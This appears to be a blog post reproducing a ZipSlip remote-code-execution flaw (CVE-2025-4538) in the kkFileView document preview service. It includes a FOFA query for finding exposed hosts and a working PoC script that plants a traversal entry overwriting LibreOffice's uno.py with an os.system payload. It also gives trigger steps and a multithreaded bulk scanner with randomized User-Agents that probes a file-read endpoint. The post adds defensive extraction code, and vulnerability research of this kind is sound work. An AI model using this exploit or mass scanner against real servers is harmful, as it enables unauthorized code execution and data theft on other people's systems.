kkFileView file preview fingerprint and vulnerability reproduction

kkFileView is an open-source online document preview service. It converts office documents with a bundled LibreOffice installation, which is what the RCE below abuses.

Web fingerprint

The default port is 8012, and the root path serves the demo home page:


Default page title: kkFileView演示首页 (kkFileView demo home page)

Core preview endpoint: /onlinePreview


FOFA query: body="/onlinePreview?url"
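The three indicators above (default port, default title, the /onlinePreview?url reference in the body) can be checked offline against a saved response before any intrusive probe is sent. The following is an added example written for this page, not kkFileView's own code: it parses the HTML properly rather than grepping, scores the indicators, and runs against a constructed sample body (not a real kkFileView response). The function name fingerprint and the target address 192.0.2.10 are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Indicators taken from the fingerprint section above.
DEFAULT_PORT = 8012
DEFAULT_TITLE = "kkFileView演示首页"
PREVIEW_MARKER = "/onlinePreview?url"


class _PageScraper(HTMLParser):
    """Collect the <title> text and every URL-bearing attribute value."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self._in_title = False
        self.urls = []

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        for name, value in attrs:
            if name in ("href", "src", "action") and value:
                self.urls.append(value)

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def fingerprint(base_url: str, html: str) -> dict:
    """Score how strongly a response looks like the kkFileView demo page."""
    scraper = _PageScraper()
    scraper.feed(html)
    parts = urlsplit(base_url)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    # The home page links to /onlinePreview?url=...; inline scripts may build the
    # same URL, so the raw body is searched as well (the string FOFA matches on).
    preview_ref = any(PREVIEW_MARKER in u for u in scraper.urls) or PREVIEW_MARKER in html
    indicators = {
        "default_port": port == DEFAULT_PORT,
        "default_title": scraper.title.strip() == DEFAULT_TITLE,
        "preview_endpoint": preview_ref,
    }
    return {
        "indicators": indicators,
        "score": sum(indicators.values()),   # 0..3
        "title": scraper.title.strip(),
    }


# Constructed sample body for offline use; it is not a captured kkFileView page.
SAMPLE_HTML = """<html><head><title>kkFileView演示首页</title></head>
<body><a href="/onlinePreview?url=test">preview</a></body></html>"""

if __name__ == "__main__":
    print(fingerprint("http://192.0.2.10:8012/", SAMPLE_HTML))
```

A score of 3 is a strong match; a score of 1 from the port alone is not, since 8012 is shared with other software. Feed the function the body of the root page fetched with a normal GET and no further requests are needed to triage a target list.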

Vulnerability reproduction

CVE-2025-4538 (ZipSlip in archive preview leading to RCE)

When an uploaded archive is previewed, kkFileView extracts its entries without normalizing the entry names, so an entry whose name contains ../ segments is written outside the extraction directory (ZipSlip). An attacker can therefore write a file to an arbitrary path on the server; overwriting a script that the bundled LibreOffice loads turns the file write into arbitrary command execution.

Affected versions: kkFileView ≤ 4.4.0-beta

Reproduction

Method 1: manual

1. Generate the payload

Edit and run poc.py; it writes the PoC archive test.zip to the current directory. The payload used here only creates a marker file, which is enough to prove execution. Adjust the LibreOffice path in the traversal entry (7.5 below) to match the target installation:

python '.\kkFileView ZipSlip CVE-2025-4538-poc.py'

poc.py contents:

import zipfile

if __name__ == "__main__":
    # Benign entry, so the archive still lists normally in the preview.
    binary1 = b'vulhub'
    # Payload that overwrites LibreOffice's uno.py; it runs the next time
    # LibreOffice loads that module, i.e. on the next office-document conversion.
    binary2 = b"import os\nos.system('touch /tmp/successHacked')\n"
    # "w" rather than "a": re-running the script must not append duplicate entries.
    with zipfile.ZipFile("test.zip", "w", zipfile.ZIP_DEFLATED) as zipFile:
        zipFile.writestr("test", binary1)
        # Entry name with enough ../ segments to climb to / from any extraction
        # directory; the vulnerable extractor joins it to the output directory
        # without normalization, so the file lands at the absolute path.
        zipFile.writestr("../../../../../../../../../../../../../../../../../../../opt/libreoffice7.5/program/uno.py", binary2)

2. Upload the payload

Upload both files, test.zip and sample.odt, to the kkFileView instance:


3. Trigger code execution

First click "Preview" on test.zip. The archive's file list is displayed; previewing is what extracts the archive, so at this step the traversal entry has already been written over /opt/libreoffice7.5/program/uno.py:


Then click "Preview" on sample.odt. kkFileView hands the document to LibreOffice for conversion, the overwritten uno.py is loaded, and the payload runs, creating /tmp/successHacked on the server. Note that the archive preview alone does not execute anything; the second preview is required.

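To make the mechanism behind the three steps concrete, the following added example (written for this page; it is not vulhub's PoC and not kkFileView's extraction code, which is Java) builds an archive shaped like test.zip in memory, lists the entries that would escape the extraction directory, contrasts a naive extractor that reproduces the bug with one that rejects the archive, and points out that Python's own extractall silently strips the .. components rather than reporting them. The helper names (build_zip, zipslip_entries, naive_extract, safe_extract) and the scratch-directory layout are assumptions.

```python
import io
import os
import shutil
import tempfile
import zipfile


def build_zip(entries: dict) -> bytes:
    """Build an archive in memory from {entry_name: content}; names are kept verbatim."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def zipslip_entries(zip_bytes: bytes, dest: str) -> list:
    """Return entry names that would resolve outside dest.

    Works on the raw entry names, so absolute names and ../ chains of any
    length are caught before anything touches the filesystem."""
    dest_real = os.path.realpath(dest)
    flagged = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            target = os.path.realpath(os.path.join(dest_real, name))
            if os.path.commonpath([dest_real, target]) != dest_real:
                flagged.append(name)
    return flagged


def naive_extract(zip_bytes: bytes, dest: str) -> list:
    """The bug class: join dest and entry name with no normalization, then write."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = os.path.join(dest, info.filename)   # "../" segments survive here
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.realpath(path))
    return written


def safe_extract(zip_bytes: bytes, dest: str) -> list:
    """Reject the whole archive if any entry escapes; extract only when clean.

    zipfile.extractall would itself drop '..' components, but silently, so the
    attempt would never be logged; the explicit check turns it into an event."""
    flagged = zipslip_entries(zip_bytes, dest)
    if flagged:
        raise ValueError("ZipSlip entries rejected: %r" % flagged)
    os.makedirs(dest, exist_ok=True)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
        return zf.namelist()


def demo() -> dict:
    """Run both extractors on a PoC-shaped archive inside a scratch directory."""
    tmp = tempfile.mkdtemp(prefix="zipslip-")
    try:
        dest = os.path.join(tmp, "extract")
        # Same shape as the page's test.zip: one benign entry, one traversal entry.
        # A single "../" suffices to land in tmp; the real PoC stacks many more
        # so that it reaches "/" from any extraction directory.
        poc = build_zip({"test": b"vulhub", "../escaped.txt": b"import os\n"})
        result = {"flagged": zipslip_entries(poc, dest)}
        naive_extract(poc, dest)
        result["escaped_written"] = os.path.isfile(os.path.join(tmp, "escaped.txt"))
        try:
            safe_extract(poc, os.path.join(tmp, "extract2"))
            result["safe_rejected"] = False
        except ValueError:
            result["safe_rejected"] = True
        result["benign_ok"] = safe_extract(build_zip({"docs/a.txt": b"hi"}),
                                           os.path.join(tmp, "extract3"))
        return result
    finally:
        shutil.rmtree(tmp, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

The check compares resolved paths with os.path.commonpath instead of a plain string prefix test, so a destination of /srv/out does not accidentally accept /srv/outside. It also rejects the whole archive rather than skipping bad entries, which is the behaviour you want at an upload boundary: a single traversal entry is a hostile file, not a formatting mistake.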

Method 2: automated detection script

The following Python script checks a list of targets in bulk. Note what it actually probes: it requests /getCorsFile?urlPath=file:///c://windows/system32/drivers/etc and reports the host as vulnerable if the response contains "hosts". That tests whether the getCorsFile endpoint returns local file content (a separate arbitrary-file-read issue), and only on Windows targets; it does not exercise the ZipSlip write, so a positive result is a hint that the instance is unpatched, and a negative result on a Linux host means nothing. Confirming CVE-2025-4538 still requires Method 1.

import random
import sys
import urllib3
import requests
from argparse import ArgumentParser
from concurrent.futures import ThreadPoolExecutor
from time import time

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def get_ua():
    """Randomised desktop Chrome User-Agent so requests do not share one fingerprint."""
    first_num = random.randint(55, 62)
    third_num = random.randint(0, 3200)
    fourth_num = random.randint(0, 140)
    os_type = [
        '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
        '(Macintosh; Intel Mac OS X 10_12_6)'
    ]
    chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
    return ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
                     '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'])


def write_targets(vurl, filename):
    """Append a confirmed URL to the results file."""
    with open(filename, "a+") as f:
        f.write(vurl + "\n")


def check_url(url):
    # Probe: ask getCorsFile to read a local Windows directory. A body containing
    # "hosts" means the server returned local file-system content.
    vulnurl = url.rstrip('/') + "/getCorsFile?urlPath=file:///c://windows/system32/drivers/etc"
    headers = {'User-Agent': get_ua()}
    try:
        res = requests.get(vulnurl, verify=False, allow_redirects=False,
                           headers=headers, timeout=5)
        if 'hosts' in res.text:
            print("\033[32m[+]{} is vulnerable\033[0m".format(url))
            write_targets(vulnurl, "vuln.txt")
        else:
            print("\033[34m[-]{} not vulnerable.\033[0m".format(url))
    except Exception:
        print("\033[34m[!]{} request failed.\033[0m".format(url))


def multithreading(url_list, pools=5):
    """Check all targets concurrently with a fixed-size worker pool."""
    with ThreadPoolExecutor(max_workers=pools) as pool:
        list(pool.map(check_url, url_list))


if __name__ == '__main__':
    arg = ArgumentParser(description='check_url By m2')
    arg.add_argument("-u", "--url", help="Target URL; Example: http://ip:port")
    arg.add_argument("-f", "--file", help="File with one target URL per line; Example: url.txt")
    args = arg.parse_args()
    url = args.url
    filename = args.file
    print("[+] Task started.....")
    start = time()
    if url is not None and filename is None:
        check_url(url)
    elif url is None and filename is not None:
        with open(filename) as fh:
            url_list = [line.strip() for line in fh if line.strip()]
        multithreading(url_list, 10)
    else:
        arg.print_help()
        sys.exit(1)
    end = time()
    print('Task finished in %ds.' % (end - start))
Posted 2025-12-02 12:52 by shinianyunyan